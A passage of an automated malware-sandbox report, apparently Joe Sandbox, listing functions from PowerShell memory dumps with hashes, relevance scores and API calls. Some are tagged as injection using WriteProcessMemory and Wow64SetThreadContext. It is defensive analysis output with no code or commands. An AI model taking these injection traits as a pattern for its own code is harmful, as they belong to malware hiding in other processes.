                                                                                                                                              • Instruction Fuzzy Hash: 9D4185B1D002599FDB10CFA9D991BEEBBB1EF48350F14842AE815AA394DB749492CF81
                                                                                                                                              Function 077FFC78 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3309 77ffc78-77ffcd6 3312 77ffd0f-77ffd71 CreateFileA 3309->3312 3313 77ffcd8-77ffce2 3309->3313 3322 77ffd7a-77ffdba 3312->3322 3323 77ffd73-77ffd79 3312->3323 3313->3312 3314 77ffce4-77ffce6 3313->3314 3316 77ffd09-77ffd0c 3314->3316 3317 77ffce8-77ffcf2 3314->3317 3316->3312 3318 77ffcf6-77ffd05 3317->3318 3319 77ffcf4 3317->3319 3318->3318 3321 77ffd07 3318->3321 3319->3318 3321->3316 3328 77ffdbc-77ffdc0 3322->3328 3329 77ffdca 3322->3329 3323->3322 3328->3329 3330 77ffdc2 3328->3330 3331 77ffdcb 3329->3331 3330->3329 3331->3331
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 077FFD61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 2028172de80f223292cc678820645accf2ad3bf96a72c843493b5a79183c6b67
                                                                                                                                              • Instruction ID: 859694b6a204e5ff13750731f18dec79068bd4b74cfc2764c4eb9a223e893adf
                                                                                                                                              • Opcode Fuzzy Hash: 2028172de80f223292cc678820645accf2ad3bf96a72c843493b5a79183c6b67
                                                                                                                                              • Instruction Fuzzy Hash: 0C4162B1D002599FDB14CFA9C991BDEBBB1FF48350F14842AE819AB394DB749492CF81
                                                                                                                                              Function 07800D48 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07800DCE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: f051905a9490111be23c7bdadceea296a1b8ff61972e2708f6bde6013daee453
                                                                                                                                              • Instruction ID: 776475e903f1ac2d8b1612ff24ff2595f34c45fa48aeffb1ee9cb02cb62ca89a
                                                                                                                                              • Opcode Fuzzy Hash: f051905a9490111be23c7bdadceea296a1b8ff61972e2708f6bde6013daee453
                                                                                                                                              • Instruction Fuzzy Hash: 14218CB1900209CFDB50DFA9C4857EEBFF4EF88324F60842AD859A7240C778A545CFA5
                                                                                                                                              Function 078015D9 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07801670
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 60611d077c02ece6837d0a6fcb13e2e8189a046eef5580e9b8c8746ee3438340
                                                                                                                                              • Instruction ID: 7c42e2a81e6db3e7d345a0cc2decf072555d42ddfda3dd7e0736fee22245ac18
                                                                                                                                              • Opcode Fuzzy Hash: 60611d077c02ece6837d0a6fcb13e2e8189a046eef5580e9b8c8746ee3438340
                                                                                                                                              • Instruction Fuzzy Hash: 4C2146B5D003599FCB10CFA9C985BEEBBF0FF48320F14842AE959A7250C7789954CBA5
                                                                                                                                              Function 078015E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07801670
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: 67132eecac7e6fca5fdb9bccc5bccbdf5368b430b69852f4a9e516ebe8a51ca5
                                                                                                                                              • Instruction ID: 3a92311edced2ef96a6053552f55374acb1e20e6c882dd142bc42481a7984999
                                                                                                                                              • Opcode Fuzzy Hash: 67132eecac7e6fca5fdb9bccc5bccbdf5368b430b69852f4a9e516ebe8a51ca5
                                                                                                                                              • Instruction Fuzzy Hash: 642125B5D003599FCB10CFAAC885BDEBBF4FF48320F14842AE959A7250C7789954CBA4
                                                                                                                                              Function 07800D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07800DCE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: 49f6bd2aa5460ec1cfa4b39c5ea06ca5efe7b8e88eccb29f398e66ad441794c6
                                                                                                                                              • Instruction ID: 8513447ebb5c29afd61a4e96f9bdbc5d68d7494924c4ab32164f3668476655c2
                                                                                                                                              • Opcode Fuzzy Hash: 49f6bd2aa5460ec1cfa4b39c5ea06ca5efe7b8e88eccb29f398e66ad441794c6
                                                                                                                                              • Instruction Fuzzy Hash: 9B212CB1D003098FDB50DFAAC4857EEBBF4EF88324F14842AD559A7240C778A545CFA5
                                                                                                                                              Function 07527158 Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000001), ref: 075271E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2719835908.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7520000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: ff86b716ea36c3c7266a91ddec4c5735e63289bd6cff02e96c8a8ebd1b6bb966
                                                                                                                                              • Instruction ID: de296f21e9689a949a25daa3f9c46da93adaa5721ab113fe6a8d96b76c9fea70
                                                                                                                                              • Opcode Fuzzy Hash: ff86b716ea36c3c7266a91ddec4c5735e63289bd6cff02e96c8a8ebd1b6bb966
                                                                                                                                              • Instruction Fuzzy Hash: 7021EEB5A00259DFCB10CF9AD885BDEBBF4FB49320F10842AE919A7350D374A940CBA4
                                                                                                                                              Function 07759270 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q
                                                                                                                                              • API String ID: 0-74704288
                                                                                                                                              • Opcode ID: 98fc188d7a6878028289c2d8c55c6ba19f7b68aa122544261c9503cedfd9bd40
                                                                                                                                              • Instruction ID: 82348afeb39acc8a9865150e5ade0b3353c055ae7244a18ccbda9497fd967955
                                                                                                                                              • Opcode Fuzzy Hash: 98fc188d7a6878028289c2d8c55c6ba19f7b68aa122544261c9503cedfd9bd40
                                                                                                                                              • Instruction Fuzzy Hash: 262182B0A0030ADFDB64CF15C844B6A77A5BF45390F458869EA148B1D0D7F1F884CF51
                                                                                                                                              Function 07BF37F4 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q
                                                                                                                                              • API String ID: 0-388095546
                                                                                                                                              • Opcode ID: 0f41a3982e18b6cb1a02743aaf0d65c6acded3e6cdb1ad35efcf9efaf458c626
                                                                                                                                              • Instruction ID: 5ce75de1cd79c8de97dacf131bd0e141906b9c48aa93ab616950fe17ef153d3c
                                                                                                                                              • Opcode Fuzzy Hash: 0f41a3982e18b6cb1a02743aaf0d65c6acded3e6cdb1ad35efcf9efaf458c626
                                                                                                                                              • Instruction Fuzzy Hash: 70F0F0B5A093816FE3228620D448662BBE5EBC2A14F0DC4EBC9448B552EB28C889C752
                                                                                                                                              Function 07BF379D Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q
                                                                                                                                              • API String ID: 0-388095546
                                                                                                                                              • Opcode ID: 8f62f389c23a130ee3fe1141c16e407468065c3d60e7ad77811232b69a927472
                                                                                                                                              • Instruction ID: 411c3445019ce117f1f5b0a6dbf025e852f923d5e98bd5b4d83dea59c7945acf
                                                                                                                                              • Opcode Fuzzy Hash: 8f62f389c23a130ee3fe1141c16e407468065c3d60e7ad77811232b69a927472
                                                                                                                                              • Instruction Fuzzy Hash: 22E04FF5E0E2518FF72A4A20E500E51BBA1AB93E11F1E82EFC1004F5A3D57588C9C392
                                                                                                                                              Function 07BF9815 Relevance: .7, Instructions: 739COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 69931223ec5f4f7d54ed009ffa90320f647e0ef41fe23c2ac9d011fbb8e11918
                                                                                                                                              • Instruction ID: 12a61d92b1cf4030b65d63c9aaed094fcc0731eb62c68035ba15ad93c43eab9c
                                                                                                                                              • Opcode Fuzzy Hash: 69931223ec5f4f7d54ed009ffa90320f647e0ef41fe23c2ac9d011fbb8e11918
                                                                                                                                              • Instruction Fuzzy Hash: 756219B4A002158FE724CB18C854B59BBB2EF86714F55C0E9D90DAB351CB72ED89CF91
                                                                                                                                              Function 07BF9838 Relevance: .7, Instructions: 723COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 46efa1c8d3848ba3a9d2d1dfef732e0dd81c68648457e0fcb66862110ad2bcb0
                                                                                                                                              • Instruction ID: 2ef5285de1035389d01c2d80587eeb10911035b3edde0501f01a6ae5279345c1
                                                                                                                                              • Opcode Fuzzy Hash: 46efa1c8d3848ba3a9d2d1dfef732e0dd81c68648457e0fcb66862110ad2bcb0
                                                                                                                                              • Instruction Fuzzy Hash: A06218B4A002158FEB24CB18C854B59BBB2EF86714F55C0E9D90DAB351CB72ED89CF91
                                                                                                                                              Function 07BF8DD8 Relevance: .7, Instructions: 684COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fbf5ffbf76ec4f19866a90b0101afe2edb55e6f2bb32cc39148d246e1bdef878
                                                                                                                                              • Instruction ID: 4baa29ce2a9c19bb96276fc12a1314660ac5839f2cd01dded2fa1c369812facb
                                                                                                                                              • Opcode Fuzzy Hash: fbf5ffbf76ec4f19866a90b0101afe2edb55e6f2bb32cc39148d246e1bdef878
                                                                                                                                              • Instruction Fuzzy Hash: FB524AB4A003058FEB14CB58C944B6ABBB2FF85714F24C4A9D919AF355DB32EC49CB91
                                                                                                                                              Function 04F085D3 Relevance: .6, Instructions: 642COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 40bf2031e2e369d2f1d525a7d0021c98e5f89a54fa815460db4c49fed1ac17d6
                                                                                                                                              • Instruction ID: 9637ffc5d680877b56aeaba4e131daa03e1c07a57e70e6e2d7b1686ea8ba1178
                                                                                                                                              • Opcode Fuzzy Hash: 40bf2031e2e369d2f1d525a7d0021c98e5f89a54fa815460db4c49fed1ac17d6
                                                                                                                                              • Instruction Fuzzy Hash: 6942A030A052589FCB15DF68C490AADBBF2FF89350F24C59AE444AB3A5D735EC46CB90
                                                                                                                                              Function 07BFA36B Relevance: .6, Instructions: 574COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 77f6562923a4a1d1ee1666f57b27b7acf73fa682cd42004e0135c0c3d2f8e8eb
                                                                                                                                              • Instruction ID: 0bc8d504242bf35e9e64ca1478cd4ffb8ce19c171f43d5556f3eb379c65a20cb
                                                                                                                                              • Opcode Fuzzy Hash: 77f6562923a4a1d1ee1666f57b27b7acf73fa682cd42004e0135c0c3d2f8e8eb
                                                                                                                                              • Instruction Fuzzy Hash: 884207B4A002148FE724CB18C855F59BBA2EF86714F55C0E9D90DAB352CB72ED89CF91
                                                                                                                                              Function 07756B5E Relevance: .5, Instructions: 503COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 398217651df4814ad17201a424dc89fa4be5235a87b85e64ed46c030b31b3ce8
                                                                                                                                              • Instruction ID: a202128fdec3753b63507915394cbd9a728fdddf7a7817ea9ceea6ea050d1697
                                                                                                                                              • Opcode Fuzzy Hash: 398217651df4814ad17201a424dc89fa4be5235a87b85e64ed46c030b31b3ce8
                                                                                                                                              • Instruction Fuzzy Hash: A43220B4A002189FDB54CB14C944FAABBB2FB85304F54C5E9DA09AB351CB71ED86CF91
                                                                                                                                              Function 04F091B0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f13e6c915ff60344d8ef248d724d11694cc352c15372d2643cc68cb8c00f65d6
                                                                                                                                              • Instruction ID: 9d58e24ae0db4c3ffd94d78d92cb6ab002dd0680b5e3b9a223a8fc5fdc097d36
                                                                                                                                              • Opcode Fuzzy Hash: f13e6c915ff60344d8ef248d724d11694cc352c15372d2643cc68cb8c00f65d6
                                                                                                                                              • Instruction Fuzzy Hash: 37D10975A012089FCB15CFA8D584E9DBBF2EF88314F15C159E805AB3A6D771EC82DB90
                                                                                                                                              Function 04F02C08 Relevance: .2, Instructions: 212COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9f0a3811daed406613b5f47ecc33f8f897ba1fa96ea12253a2acc3902a34dbff
                                                                                                                                              • Instruction ID: 632f4d7c9d11b183932e58b8fee65599ae89dfb001d340545ede7dbdc2ed6389
                                                                                                                                              • Opcode Fuzzy Hash: 9f0a3811daed406613b5f47ecc33f8f897ba1fa96ea12253a2acc3902a34dbff
                                                                                                                                              • Instruction Fuzzy Hash: 02916E74A002458FCB05CF99C498AAEFBB1FF88310B2585A9E515AB3A5C735FC51CFA0
                                                                                                                                              Function 04F07658 Relevance: .1, Instructions: 141COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 155310a0fd8bc9d66f13e798230c6f8b9962af406f221bbfe39345bcd2b40bff
                                                                                                                                              • Instruction ID: c5e5f2d115297616b407eb02fb9b24d5545ae3c0ea402c7c6f15050519ab7129
                                                                                                                                              • Opcode Fuzzy Hash: 155310a0fd8bc9d66f13e798230c6f8b9962af406f221bbfe39345bcd2b40bff
                                                                                                                                              • Instruction Fuzzy Hash: DE516D7190E3E59FC702EF2CC9A0499BFB0AF4621071941D7D484DB2A3D625EC9DCBA5
                                                                                                                                              Function 04F093D5 Relevance: .1, Instructions: 130COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd7aa7c9a4de9d36f2079b06f1fed32fce09410fe0e226a01976d527d10197ee
                                                                                                                                              • Instruction ID: ebe0ccf69a5c21a10b1e1021aef56c0288cea0176f79f529907fdbde09cde80c
                                                                                                                                              • Opcode Fuzzy Hash: cd7aa7c9a4de9d36f2079b06f1fed32fce09410fe0e226a01976d527d10197ee
                                                                                                                                              • Instruction Fuzzy Hash: 0A51E874A01209EFCB05CFA8D584A9DBBF6BF88310F24C559E404AB3A5D775EC82DB50
                                                                                                                                              Function 07BF71F8 Relevance: .1, Instructions: 125COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ca164694949a810077c474ee784f28866d4cf7035c9e994e42df69a5e55cc264
                                                                                                                                              • Instruction ID: 69af6414952c7597df9a209af439c2e28fb3c99316ea4bff524c40a7320bdfeb
                                                                                                                                              • Opcode Fuzzy Hash: ca164694949a810077c474ee784f28866d4cf7035c9e994e42df69a5e55cc264
                                                                                                                                              • Instruction Fuzzy Hash: DC4137B1B002159FDB14AFB988402AEBBA1EFC5B10F5488EADD05DB341DE32D909C7E0
                                                                                                                                              Function 04F02D18 Relevance: .1, Instructions: 112COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f07dad25a0adfa76d57131ed55f15868607bd7bce62bec47b6aee0dcf3d05481
                                                                                                                                              • Instruction ID: 4ace588e4230dd7bed6e1716a93e41b8ad378d954a5d37f7bcdf6ebb434095e3
                                                                                                                                              • Opcode Fuzzy Hash: f07dad25a0adfa76d57131ed55f15868607bd7bce62bec47b6aee0dcf3d05481
                                                                                                                                              • Instruction Fuzzy Hash: B9413CB4A016059FCB09CF59C5989AAFBB1FF88310B168599D805AB3A5C736FC51CFA0
                                                                                                                                              Function 07758BD8 Relevance: .1, Instructions: 105COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9625e91512d0c4eb33eed30590164afc9077b4221325145673739434354f813f
                                                                                                                                              • Instruction ID: 20f266e62aa3a4a7cc3e4ffe4d33fb0d1578847658ad98fc6f845ecbdf5e6faf
                                                                                                                                              • Opcode Fuzzy Hash: 9625e91512d0c4eb33eed30590164afc9077b4221325145673739434354f813f
                                                                                                                                              • Instruction Fuzzy Hash: 8341D3B4B002089FCB08DF58D44499EBBE6FB88750F248899ED05AF350CB71ED058BE1
                                                                                                                                              Function 07758B9F Relevance: .1, Instructions: 104COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: abc06b8b193274b68ebd1257ffc8d99453a72838d79e4f267036665605e61e55
                                                                                                                                              • Instruction ID: cb2e44b2f6b218fdfb84fb7ccee5b29ceef37dc6f111a112f90d7e1a28141ae4
                                                                                                                                              • Opcode Fuzzy Hash: abc06b8b193274b68ebd1257ffc8d99453a72838d79e4f267036665605e61e55
                                                                                                                                              • Instruction Fuzzy Hash: F641B3B4B002089FCB08DF58C440A9DBBE2BB88754F25C899ED05AF351CB71ED058BE2
                                                                                                                                              Function 07BF71D9 Relevance: .1, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c4665539e69f701f1f6d16083db3ae77002e55159e0c84dd3bf8ad6ad7b356d4
                                                                                                                                              • Instruction ID: b924cb2b576938f30394a343f84bf8434d2bb163829340f79ad28d63647ff708
                                                                                                                                              • Opcode Fuzzy Hash: c4665539e69f701f1f6d16083db3ae77002e55159e0c84dd3bf8ad6ad7b356d4
                                                                                                                                              • Instruction Fuzzy Hash: 10313CB1E002149FCB049F7988400ADBBE5FF86A10B6484EADD45EB341DA31DD0AC7E0
                                                                                                                                              Function 04F073E8 Relevance: .1, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2687838595.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_4f00000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b12d3ce24f1d4b20fbe10dec5968308dbf46b60bffe781ab64fd611f6859dcf2
                                                                                                                                              • Instruction ID: cf5cef82a17f120302593781f36c41f2d17e7e1edfaeaa84c650d386d842bcc3
                                                                                                                                              • Opcode Fuzzy Hash: b12d3ce24f1d4b20fbe10dec5968308dbf46b60bffe781ab64fd611f6859dcf2
                                                                                                                                              • Instruction Fuzzy Hash: 47313535E00614CFDB24EF79C9446AEB7F2BF88244F108568C416AB354DB35BD46DB91
                                                                                                                                              Function 034290C0 Relevance: .1, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dad05f38f3f9ef85d4ec3fa13e2bdd53359dcb2d445ad345d9e839c2b8fbd35e
                                                                                                                                              • Instruction ID: 607700f869f41e6cc600de815bcbeb060b818603d0763d369bd43409dd5624c4
                                                                                                                                              • Opcode Fuzzy Hash: dad05f38f3f9ef85d4ec3fa13e2bdd53359dcb2d445ad345d9e839c2b8fbd35e
